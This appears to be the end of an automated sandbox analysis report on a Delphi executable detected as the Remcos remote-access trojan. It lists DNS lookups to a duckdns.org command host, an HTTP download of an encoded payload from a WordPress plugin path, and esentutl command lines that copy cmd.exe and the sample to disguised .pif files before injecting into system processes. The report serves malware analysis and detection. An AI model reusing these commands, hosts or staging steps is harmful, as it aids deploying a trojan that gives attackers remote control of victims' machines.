                                                                Nov 26, 2024 08:17:11.643409967 CET195049988172.111.212.138192.168.2.11
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 26, 2024 08:13:08.286797047 CET5160453192.168.2.111.1.1.1
                                                                Nov 26, 2024 08:13:08.979010105 CET53516041.1.1.1192.168.2.11
                                                                Nov 26, 2024 08:13:18.798896074 CET5434453192.168.2.111.1.1.1
                                                                Nov 26, 2024 08:13:19.126370907 CET53543441.1.1.1192.168.2.11
                                                                Nov 26, 2024 08:14:28.281137943 CET6543653192.168.2.111.1.1.1
                                                                Nov 26, 2024 08:14:28.601784945 CET53654361.1.1.1192.168.2.11
                                                                Nov 26, 2024 08:15:37.906471014 CET5180853192.168.2.111.1.1.1
                                                                Nov 26, 2024 08:15:38.233345032 CET53518081.1.1.1192.168.2.11
                                                                Nov 26, 2024 08:16:47.437545061 CET6524653192.168.2.111.1.1.1
                                                                Nov 26, 2024 08:16:47.776942968 CET53652461.1.1.1192.168.2.11
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 26, 2024 08:13:08.286797047 CET192.168.2.111.1.1.10xa460Standard query (0)aarzoomarine.comA (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:13:18.798896074 CET192.168.2.111.1.1.10x83aaStandard query (0)craekuro.duckdns.orgA (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:14:28.281137943 CET192.168.2.111.1.1.10x3151Standard query (0)craekuro.duckdns.orgA (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:15:37.906471014 CET192.168.2.111.1.1.10x76bcStandard query (0)craekuro.duckdns.orgA (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:16:47.437545061 CET192.168.2.111.1.1.10x968eStandard query (0)craekuro.duckdns.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 26, 2024 08:13:08.979010105 CET1.1.1.1192.168.2.110xa460No error (0)aarzoomarine.com103.101.59.23A (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:13:19.126370907 CET1.1.1.1192.168.2.110x83aaNo error (0)craekuro.duckdns.org172.111.212.138A (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:14:28.601784945 CET1.1.1.1192.168.2.110x3151No error (0)craekuro.duckdns.org172.111.212.138A (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:15:38.233345032 CET1.1.1.1192.168.2.110x76bcNo error (0)craekuro.duckdns.org172.111.212.138A (IP address)IN (0x0001)false
                                                                Nov 26, 2024 08:16:47.776942968 CET1.1.1.1192.168.2.110x968eNo error (0)craekuro.duckdns.org172.111.212.138A (IP address)IN (0x0001)false
                                                                • aarzoomarine.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1149706103.101.59.234437564C:\Users\user\Desktop\1m181Ru74o.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-26 07:13:11 UTC184OUTGET /wp-content/plugins/231_Ntmftfldhfc HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                Host: aarzoomarine.com
                                                                2024-11-26 07:13:13 UTC336INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Tue, 26 Nov 2024 07:12:56 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 1053816
                                                                Last-Modified: Tue, 13 Aug 2024 08:51:50 GMT
                                                                Connection: close
                                                                ETag: "66bb1ea6-101478"
                                                                Strict-Transport-Security: max-age=15768000; includeSubDomains
                                                                X-Powered-By: PleskLin
                                                                Accept-Ranges: bytes
                                                                2024-11-26 07:13:13 UTC16048INData Raw: 70 4b 79 6a 56 79 47 6c 72 30 6b 4f 4a 52 77 51 45 78 59 6a 45 43 55 51 45 53 45 66 48 52 30 6b 48 53 41 4e 46 79 55 69 48 43 55 68 44 68 38 69 46 53 41 5a 47 52 45 51 48 52 41 51 44 52 77 6c 49 42 30 66 48 78 38 6a 45 77 34 5a 44 52 63 4e 49 78 45 56 46 43 55 61 46 68 41 66 47 78 34 56 48 68 49 66 49 42 38 67 44 52 63 61 47 52 6b 57 44 52 6b 4f 45 42 73 6a 47 77 77 55 45 41 77 68 45 69 49 62 45 42 34 68 45 78 59 64 49 68 34 61 45 43 4d 67 44 68 61 6b 72 4b 4e 58 49 61 57 76 53 56 63 66 47 42 45 66 45 52 63 50 45 78 45 4f 70 4b 79 6a 56 79 47 6c 72 30 6d 71 6f 35 79 77 74 62 4b 6c 73 4b 4f 77 72 35 2b 68 6d 35 75 6b 6d 36 43 72 75 61 4f 65 6e 4b 4f 66 71 71 47 65 73 36 43 33 74 36 2b 77 6d 37 43 77 71 35 79 6a 6f 4a 75 68 6f 61 47 6c 74 61 71 33 71 37 6d
                                                                Data Ascii: pKyjVyGlr0kOJRwQExYjECUQESEfHR0kHSANFyUiHCUhDh8iFSAZGREQHRAQDRwlIB0fHx8jEw4ZDRcNIxEVFCUaFhAfGx4VHhIfIB8gDRcaGRkWDRkOEBsjGwwUEAwhEiIbEB4hExYdIh4aECMgDhakrKNXIaWvSVcfGBEfERcPExEOpKyjVyGlr0mqo5ywtbKlsKOwr5+hm5ukm6CruaOenKOfqqGes6C3t6+wm7Cwq5yjoJuhoaGltaq3q7m
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 47 61 7a 62 59 4d 65 33 6a 79 43 31 34 33 61 46 66 36 30 73 61 68 51 4c 74 49 6b 54 50 6c 70 74 49 5a 41 32 39 79 54 49 31 53 4a 4c 7a 4a 79 65 5a 4c 79 45 74 5a 6e 4d 50 39 68 72 76 6f 75 31 75 2f 51 56 49 6d 41 51 54 44 68 39 6d 64 34 66 52 4a 44 46 4d 69 63 67 63 63 39 62 6c 50 47 6d 36 34 54 42 77 58 6b 59 46 36 4d 6f 79 6a 56 5a 77 38 4a 43 52 4a 4c 53 64 79 48 42 2f 35 62 64 54 52 45 53 75 39 66 4d 56 61 59 75 32 68 53 39 51 6c 6c 45 6e 6e 47 43 4c 78 57 35 68 75 54 70 36 78 77 38 45 49 33 6d 33 44 59 62 64 34 6a 52 31 56 6b 2b 70 7a 76 72 2f 62 79 57 50 31 53 69 4e 72 38 73 47 4d 7a 6c 70 50 55 79 57 65 51 4f 37 4d 64 2f 4e 32 32 36 46 63 6a 47 47 59 36 75 61 49 75 2b 7a 49 53 48 37 62 5a 73 4a 67 67 53 59 65 4f 69 53 73 41 65 57 74 4e 4d 53 77 58
                                                                Data Ascii: GazbYMe3jyC143aFf60sahQLtIkTPlptIZA29yTI1SJLzJyeZLyEtZnMP9hrvou1u/QVImAQTDh9md4fRJDFMicgcc9blPGm64TBwXkYF6MoyjVZw8JCRJLSdyHB/5bdTRESu9fMVaYu2hS9QllEnnGCLxW5huTp6xw8EI3m3DYbd4jR1Vk+pzvr/byWP1SiNr8sGMzlpPUyWeQO7Md/N226FcjGGY6uaIu+zISH7bZsJggSYeOiSsAeWtNMSwX
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 39 6b 6b 79 45 6f 4f 4f 36 69 4b 74 31 4e 59 4d 37 79 71 4f 79 67 2f 32 2b 4c 6f 46 4e 59 69 6e 79 35 35 6f 6d 73 36 35 72 4c 6a 4d 33 75 42 72 75 6c 46 66 39 6a 61 65 75 43 41 74 79 65 2f 47 75 73 33 43 4c 30 41 55 34 63 68 75 44 5a 72 48 61 57 46 51 72 6e 2f 44 56 6e 56 4d 6b 49 30 72 78 44 77 74 39 37 4f 46 47 75 33 6e 35 6c 30 74 6a 41 36 31 63 4a 66 57 47 36 52 4f 5a 67 41 72 53 7a 6b 4c 62 36 59 4c 7a 41 73 2f 2b 33 69 57 4f 78 56 51 39 44 4e 33 50 2b 35 73 2b 34 62 46 47 36 35 4b 6d 6e 6d 50 5a 4a 61 46 39 30 41 68 49 64 6a 4b 47 55 6d 35 37 4e 70 57 37 39 50 30 56 4d 41 62 55 30 50 6e 76 36 77 30 64 32 37 47 4e 6a 50 6b 66 33 6c 2b 32 43 45 38 70 2b 67 58 54 4e 62 65 4a 77 68 46 4e 79 73 7a 79 75 39 56 61 43 76 66 6d 33 67 45 67 4b 73 32 54 73 57
                                                                Data Ascii: 9kkyEoOO6iKt1NYM7yqOyg/2+LoFNYiny55oms65rLjM3uBrulFf9jaeuCAtye/Gus3CL0AU4chuDZrHaWFQrn/DVnVMkI0rxDwt97OFGu3n5l0tjA61cJfWG6ROZgArSzkLb6YLzAs/+3iWOxVQ9DN3P+5s+4bFG65KmnmPZJaF90AhIdjKGUm57NpW79P0VMAbU0Pnv6w0d27GNjPkf3l+2CE8p+gXTNbeJwhFNyszyu9VaCvfm3gEgKs2TsW
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 45 44 30 4a 52 59 72 54 41 6c 6e 4d 55 78 59 68 78 46 4c 67 4c 41 42 67 31 30 72 79 69 37 4e 30 51 52 47 4a 7a 47 47 61 50 70 50 6f 68 70 62 71 6e 31 4e 37 4a 5a 58 43 67 72 6b 51 4f 7a 55 41 35 79 61 76 43 72 77 4e 68 6d 52 51 69 76 4b 6c 4a 31 36 55 51 67 69 48 61 50 4a 57 45 58 4d 55 5a 74 48 7a 6e 6e 52 51 61 4c 34 77 2f 5a 44 67 35 48 6e 78 57 68 4d 41 32 4d 34 52 4a 6a 51 32 78 67 32 62 59 33 71 55 47 6d 57 36 54 6e 53 72 32 4e 49 36 56 4b 45 73 4d 2f 6c 52 7a 47 57 36 4f 51 56 70 6e 6a 45 42 77 6a 6e 61 64 68 75 42 74 4e 76 59 64 59 47 53 63 41 34 78 31 33 31 44 67 49 48 54 39 59 35 4f 58 63 58 61 78 79 75 79 79 44 34 59 6c 6c 38 37 74 34 67 43 55 76 35 63 4f 57 53 33 45 6b 68 34 75 6a 5a 64 6c 33 4a 4e 39 67 38 4b 77 33 6d 65 44 4c 41 57 5a 2b 65
                                                                Data Ascii: ED0JRYrTAlnMUxYhxFLgLABg10ryi7N0QRGJzGGaPpPohpbqn1N7JZXCgrkQOzUA5yavCrwNhmRQivKlJ16UQgiHaPJWEXMUZtHznnRQaL4w/ZDg5HnxWhMA2M4RJjQ2xg2bY3qUGmW6TnSr2NI6VKEsM/lRzGW6OQVpnjEBwjnadhuBtNvYdYGScA4x131DgIHT9Y5OXcXaxyuyyD4Yll87t4gCUv5cOWS3Ekh4ujZdl3JN9g8Kw3meDLAWZ+e
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 34 47 4e 4d 59 4c 68 37 46 55 61 68 49 62 34 41 77 36 34 30 6c 58 74 76 6d 43 2f 32 2f 65 39 59 77 42 44 79 4c 68 5a 6d 68 7a 79 41 48 68 70 39 61 69 69 44 4c 32 56 37 53 42 4e 4e 61 35 64 48 50 34 55 6d 53 72 58 45 56 2f 30 30 77 58 72 57 58 47 4b 6c 4f 38 73 44 2b 6e 4f 42 58 67 59 49 44 41 61 31 46 41 6b 58 44 2b 54 4d 4f 6b 52 51 55 34 71 63 50 51 6f 68 73 50 39 73 77 53 70 7a 6f 69 33 31 45 57 4a 46 53 48 79 72 41 58 49 4e 4e 51 4c 4a 4b 49 39 63 4e 31 69 32 68 54 76 69 32 67 77 46 74 72 71 67 33 48 64 35 6d 4d 35 33 79 35 64 4e 63 58 54 42 6e 43 5a 4a 4d 43 63 59 57 68 57 2f 50 33 55 62 2f 74 38 37 62 44 37 57 4b 32 67 57 4a 6c 6c 39 52 46 37 76 57 64 42 67 76 72 6c 74 62 38 35 53 7a 41 30 63 54 6f 4d 73 43 68 6e 46 4a 44 73 46 75 7a 6c 35 4b 4e 78
                                                                Data Ascii: 4GNMYLh7FUahIb4Aw640lXtvmC/2/e9YwBDyLhZmhzyAHhp9aiiDL2V7SBNNa5dHP4UmSrXEV/00wXrWXGKlO8sD+nOBXgYIDAa1FAkXD+TMOkRQU4qcPQohsP9swSpzoi31EWJFSHyrAXINNQLJKI9cN1i2hTvi2gwFtrqg3Hd5mM53y5dNcXTBnCZJMCcYWhW/P3Ub/t87bD7WK2gWJll9RF7vWdBgvrltb85SzA0cToMsChnFJDsFuzl5KNx
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 74 42 7a 52 46 51 57 54 53 55 6a 63 55 4e 39 49 53 67 59 72 4b 46 6f 64 37 73 65 70 47 4d 57 70 4f 6f 65 43 53 56 35 59 39 38 45 6b 71 2f 41 69 36 4d 6a 76 49 78 41 7a 6d 79 55 64 43 75 77 57 39 42 31 79 70 63 51 4e 77 66 6f 39 52 48 30 59 35 62 4f 34 4f 4a 58 70 46 6d 64 75 72 6f 77 70 59 4b 4a 36 6f 6f 76 4f 72 4b 6c 71 63 54 38 77 30 61 71 39 36 57 75 64 4b 57 63 37 77 77 76 71 4a 44 4d 63 45 64 6c 41 5a 50 59 6d 6d 36 2b 55 58 4a 36 4e 65 6a 74 4b 50 62 71 41 33 78 49 68 66 5a 38 33 6b 55 37 56 4d 78 42 55 4c 47 75 70 45 78 44 6b 48 44 76 52 53 49 62 33 4a 6d 7a 6e 49 6f 75 39 75 45 33 47 47 71 4f 66 31 43 72 47 73 31 62 5a 47 45 68 59 57 68 53 72 59 38 50 63 73 77 6d 48 49 7a 55 59 71 54 6e 34 31 79 47 70 4a 44 39 33 78 75 57 74 65 5a 6d 36 74 4f 4f
                                                                Data Ascii: tBzRFQWTSUjcUN9ISgYrKFod7sepGMWpOoeCSV5Y98Ekq/Ai6MjvIxAzmyUdCuwW9B1ypcQNwfo9RH0Y5bO4OJXpFmdurowpYKJ6oovOrKlqcT8w0aq96WudKWc7wwvqJDMcEdlAZPYmm6+UXJ6NejtKPbqA3xIhfZ83kU7VMxBULGupExDkHDvRSIb3JmznIou9uE3GGqOf1CrGs1bZGEhYWhSrY8PcswmHIzUYqTn41yGpJD93xuWteZm6tOO
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 4f 36 5a 36 65 2f 53 51 77 50 44 55 37 6e 58 6a 6b 46 59 37 68 2f 62 32 45 6b 44 51 6b 49 6d 78 43 43 49 49 32 72 71 6c 75 49 49 4c 5a 70 66 44 70 6f 6d 75 7a 46 63 6f 65 39 39 39 6b 50 6f 77 74 53 77 73 4b 75 72 67 42 36 6a 36 37 62 49 71 77 4a 63 53 36 31 33 70 73 67 65 52 64 62 44 6b 36 53 52 45 57 39 33 47 73 59 67 49 34 74 73 70 33 4e 30 4e 69 74 56 38 78 48 6f 79 62 2b 35 51 44 4d 72 78 74 68 38 46 6f 67 53 78 52 35 4d 69 4f 56 52 47 35 61 67 64 69 4f 37 54 4b 70 42 52 37 68 58 6c 57 6d 41 38 36 61 41 6e 50 4f 49 32 6a 6d 33 54 32 64 46 45 78 42 76 57 64 37 73 76 48 6d 42 6f 31 31 33 6e 44 4c 70 33 7a 55 75 65 59 31 66 4a 66 45 46 4a 37 5a 74 76 31 33 6b 75 42 64 4e 33 37 41 70 55 5a 59 4c 36 4e 6f 50 69 53 6c 71 53 6b 32 76 70 30 79 4b 6c 64 6c 4c
                                                                Data Ascii: O6Z6e/SQwPDU7nXjkFY7h/b2EkDQkImxCCII2rqluIILZpfDpomuzFcoe999kPowtSwsKurgB6j67bIqwJcS613psgeRdbDk6SREW93GsYgI4tsp3N0NitV8xHoyb+5QDMrxth8FogSxR5MiOVRG5agdiO7TKpBR7hXlWmA86aAnPOI2jm3T2dFExBvWd7svHmBo113nDLp3zUueY1fJfEFJ7Ztv13kuBdN37ApUZYL6NoPiSlqSk2vp0yKldlL
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 46 56 30 6d 5a 51 33 70 6c 64 53 4f 4a 37 64 59 69 38 30 31 59 68 6e 79 43 4d 5a 64 42 4c 65 64 6b 48 76 68 61 34 50 32 55 66 6f 52 69 56 57 30 62 6e 76 4a 39 6c 5a 54 61 7a 59 33 66 62 4e 6e 69 6e 44 43 2f 48 4f 62 62 4d 65 2f 4c 44 4f 72 35 44 45 55 42 79 71 61 43 64 38 61 39 67 67 43 38 61 53 52 45 4a 64 2b 35 57 72 41 42 71 73 71 73 73 46 64 5a 36 4e 66 47 64 76 38 47 51 4a 58 50 70 47 52 61 4f 65 6e 79 42 57 79 41 74 6d 72 77 39 64 4e 4d 70 46 4e 4c 45 52 6b 6d 61 72 58 65 47 4f 4e 56 67 30 71 6f 59 2b 31 30 55 65 38 39 59 6c 44 30 31 55 6f 43 43 79 33 61 57 32 51 46 54 74 6f 64 34 32 75 4a 7a 54 64 67 34 30 6a 45 76 6c 7a 44 74 75 39 70 54 6c 57 79 65 64 54 50 70 68 7a 72 50 73 38 36 5a 57 51 64 64 39 38 69 6e 70 63 6e 74 77 6c 76 67 48 4b 72 4d 70
                                                                Data Ascii: FV0mZQ3pldSOJ7dYi801YhnyCMZdBLedkHvha4P2UfoRiVW0bnvJ9lZTazY3fbNninDC/HObbMe/LDOr5DEUByqaCd8a9ggC8aSREJd+5WrABqsqssFdZ6NfGdv8GQJXPpGRaOenyBWyAtmrw9dNMpFNLERkmarXeGONVg0qoY+10Ue89YlD01UoCCy3aW2QFTtod42uJzTdg40jEvlzDtu9pTlWyedTPphzrPs86ZWQdd98inpcntwlvgHKrMp
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 6b 4a 58 71 4f 67 6c 75 66 33 30 49 61 53 62 4e 31 42 68 77 63 6c 48 74 39 5a 76 78 4b 2f 4b 39 30 6b 61 55 52 48 48 52 4a 73 38 39 72 42 35 7a 64 7a 68 62 76 30 2f 72 59 51 46 6c 4b 50 69 4d 55 34 75 71 67 38 5a 55 57 35 64 34 33 39 6d 76 47 43 53 43 5a 78 72 76 37 6f 32 54 4e 6f 63 71 30 66 6c 43 4d 33 59 4a 78 57 2b 72 32 57 45 5a 70 53 78 72 71 58 7a 37 64 59 77 50 33 32 66 79 58 2b 42 42 74 34 34 50 48 4a 51 61 4d 43 70 5a 75 37 32 46 59 44 74 71 38 50 31 6f 52 59 58 32 4c 63 76 59 4b 30 49 57 66 31 30 76 4a 53 50 2f 34 39 67 32 4c 70 43 79 53 64 63 38 50 30 4b 45 56 6a 6d 2b 57 30 4e 42 53 6d 2b 64 68 49 2f 2f 79 4c 64 71 78 74 72 6e 32 77 55 69 38 49 4a 4a 38 75 73 71 47 54 74 56 50 6e 35 56 41 52 4b 6a 45 2b 63 65 53 4a 2f 6e 6d 4e 63 6c 46 4f 41
                                                                Data Ascii: kJXqOgluf30IaSbN1BhwclHt9ZvxK/K90kaURHHRJs89rB5zdzhbv0/rYQFlKPiMU4uqg8ZUW5d439mvGCSCZxrv7o2TNocq0flCM3YJxW+r2WEZpSxrqXz7dYwP32fyX+BBt44PHJQaMCpZu72FYDtq8P1oRYX2LcvYK0IWf10vJSP/49g2LpCySdc8P0KEVjm+W0NBSm+dhI//yLdqxtrn2wUi8IJJ8usqGTtVPn5VARKjE+ceSJ/nmNclFOA
                                                                2024-11-26 07:13:13 UTC16384INData Raw: 58 48 7a 4b 63 34 79 4d 5a 68 34 33 77 70 2f 44 4f 79 44 35 6a 62 2f 39 68 6e 54 64 50 4f 77 54 6c 63 59 46 51 78 64 38 72 34 71 39 69 47 58 39 48 44 65 2b 73 62 48 76 52 33 41 4b 32 4b 53 49 6d 39 5a 42 54 42 43 6c 34 69 65 46 4a 59 4b 73 48 58 64 6b 54 6f 42 6d 47 51 4f 74 75 31 4b 45 6a 47 52 71 76 43 41 48 4e 35 35 53 74 75 68 73 59 4e 53 31 32 46 6c 53 4c 55 50 69 5a 4a 6d 48 6d 76 6a 73 59 4c 6d 79 6c 58 34 6b 6f 69 4b 57 39 38 77 54 4e 7a 2f 51 61 52 77 6a 42 64 69 6c 30 67 71 49 47 36 44 63 6c 7a 4d 55 57 45 70 4e 59 43 51 57 54 36 34 58 70 39 49 76 63 77 70 39 2b 6b 68 5a 6c 4b 79 76 78 6a 39 37 7a 53 55 31 51 64 47 67 33 2b 55 48 39 37 33 6e 4f 52 37 45 39 53 48 72 78 45 5a 67 44 59 41 39 63 49 5a 6e 63 63 4e 7a 4c 6c 70 31 33 54 49 43 2b 2f 59
                                                                Data Ascii: XHzKc4yMZh43wp/DOyD5jb/9hnTdPOwTlcYFQxd8r4q9iGX9HDe+sbHvR3AK2KSIm9ZBTBCl4ieFJYKsHXdkToBmGQOtu1KEjGRqvCAHN55StuhsYNS12FlSLUPiZJmHmvjsYLmylX4koiKW98wTNz/QaRwjBdil0gqIG6DclzMUWEpNYCQWT64Xp9Ivcwp9+khZlKyvxj97zSU1QdGg3+UH973nOR7E9SHrxEZgDYA9cIZnccNzLlp13TIC+/Y


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:02:13:06
                                                                Start date:26/11/2024
                                                                Path:C:\Users\user\Desktop\1m181Ru74o.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\1m181Ru74o.exe"
                                                                Imagebase:0x400000
                                                                File size:1'566'208 bytes
                                                                MD5 hash:06A72BA35AAFF1B3AB0EA4D3E2E65451
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:02:13:15
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" "
                                                                Imagebase:0xc30000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:02:13:16
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:02:13:16
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                Imagebase:0x9e0000
                                                                File size:352'768 bytes
                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:02:13:17
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                Imagebase:0x9e0000
                                                                File size:352'768 bytes
                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:02:13:17
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o
                                                                Imagebase:0x9e0000
                                                                File size:352'768 bytes
                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:02:13:17
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff68cce0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:02:13:17
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\SndVol.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\System32\SndVol.exe
                                                                Imagebase:0x290000
                                                                File size:226'712 bytes
                                                                MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762154701.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762154701.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3777713099.0000000025A3F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.3762154701.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:11
                                                                Start time:02:13:28
                                                                Start date:26/11/2024
                                                                Path:C:\Users\Public\Libraries\Ntmftfld.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Ntmftfld.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'566'208 bytes
                                                                MD5 hash:06A72BA35AAFF1B3AB0EA4D3E2E65451
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 66%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:02:13:30
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\System32\colorcpl.exe
                                                                Imagebase:0xd40000
                                                                File size:86'528 bytes
                                                                MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.1544682057.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
